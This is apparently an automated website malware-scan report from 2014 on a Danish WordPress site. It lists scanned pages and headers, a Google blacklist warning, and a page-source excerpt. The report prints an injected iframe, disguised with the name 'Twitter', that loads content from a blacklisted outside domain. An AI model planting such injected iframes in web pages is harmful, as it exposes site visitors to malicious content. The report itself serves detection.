New scan:

Malware Scanner report for mester-mal.dk

Malicious/Suspicious/Total urls checked
1/0/12
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "mester-mal.dk" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/0/1
1 malicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mester-mal.dk

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://mester-mal.dk/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 31 May 2014 04:47:03 GMT
Location: http://www.mester-mal.dk/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mester-mal.dk/xmlrpc.php
X-Powered-By: PHP/5.2.17
clean
http://www.mester-mal.dk/
200 OK
Content-Length: 10544
Content-Type: text/html
malicious
Page code contains blacklisted domain: nmsbaseball.com

...[12439 bytes skipped]...
wpcf7 = {"loaderUrl":"http:\/\/www.mester-mal.dk\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sender ..."};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.mester-mal.dk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3'></script>
</div><iframe name=Twitter scrolling=auto frameborder=no align=center height=23 width=90 src=http://nmsbaseball.com/post.php?id=59026></iframe></body>
</html>

Malicious iFrame found.
size: 90x23     
src: http://nmsbaseball.com/post.php?id=59026
This URL is marked by Google as suspicious

<iframe name=twitter scrolling=auto frameborder=no align=center height=23 width=90 src=http://nmsbaseball.com/post.php?id=59026>

http://www.mester-mal.dk/wp-content/themes/malermester4/script.js
200 OK
Content-Length: 14585
Content-Type: application/javascript
clean
http://www.mester-mal.dk/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3
200 OK
Content-Length: 9986
Content-Type: application/javascript
clean
http://www.mester-mal.dk/wp-includes/js/swfobject.js?ver=2.2
200 OK
Content-Length: 10220
Content-Type: application/javascript
clean
http://www.mester-mal.dk/wp-includes/js/jquery/jquery.js?ver=1.7.1
200 OK
Content-Length: 93889
Content-Type: application/javascript
clean
http://www.mester-mal.dk/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.3
200 OK
Content-Length: 931
Content-Type: application/javascript
clean
http://sgme.azurewebsites.net/cookie.js
200 OK
Content-Length: 6816
Content-Type: application/x-javascript
clean
http://lite.piclens.com/current/piclens_optimized.js?ver=3.3
200 OK
Content-Length: 21750
Content-Type: application/x-javascript
clean
http://www.mester-mal.dk/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18
200 OK
Content-Length: 15158
Content-Type: application/javascript
clean
http://www.mester-mal.dk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3
200 OK
Content-Length: 6933
Content-Type: application/javascript
clean
http://mester-mal.dk/test404page.js
404 Not Found
Content-Length: 275
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mester-mal.dk

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 31 May 2014 04:47:03 GMT
Location: http://www.mester-mal.dk/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mester-mal.dk/xmlrpc.php
X-Powered-By: PHP/5.2.17

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mester-mal.dk
Referer: http://www.google.com/search?q=mester-mal.dk

Result:
The result is similar to the first query. There are no suspicious redirects found.